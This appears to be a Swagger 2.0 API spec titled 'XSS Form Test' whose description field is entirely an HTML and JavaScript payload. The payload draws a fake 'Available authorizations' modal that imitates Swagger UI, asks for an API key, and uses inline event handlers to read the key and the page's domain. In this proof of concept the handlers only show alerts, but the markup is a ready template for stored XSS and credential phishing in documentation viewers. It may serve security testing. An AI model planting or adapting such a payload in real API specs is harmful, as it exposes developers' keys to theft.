swagger: '2.0'
info:
  title: XSS Form Test
  description: |
    <div id="authModal" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 9999;">
      <form id="fakeAuthForm" onsubmit="event.preventDefault(); alert('Captured input: ' + document.getElementById('apiKey').value);"
            style="background-color: white; padding: 20px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3); text-align: left; width: 300px;">
        <h3 style="margin-top: 0;">Available authorizations</h3>
        <h4 style="color: #4CAF50; margin: 0;">API key authorization</h4>
        <p style="color: #888; margin: 8px 0 4px;">API Key Authenticationheader</p>
        <label for="apiKey">Key:</label><br>
        <input type="text" id="apiKey" placeholder="api_key" style="width: 100%; margin: 10px 0; padding: 5px; border: 1px solid #ccc; border-radius: 4px;"><br>
        <div style="display: flex; justify-content: space-between; margin-top: 10px;">
          <button type="button" onclick="const domain = window.location.hostname; const inputData = document.getElementById('apiKey').value; alert('Domain: ' + domain + '\nInput Data: ' + inputData);" style="padding: 6px 12px; background-color: #e0e0e0; border: 1px solid #ccc; border-radius: 4px;">Authorize</button>
          <button type="button" onclick="document.getElementById('authModal').remove();" style="padding: 6px 12px; background-color: #e0e0e0; border: 1px solid #ccc; border-radius: 4px;">Cancel</button>
        </div>
      </form>
    </div>
  version: "1.0.0"
paths: {}
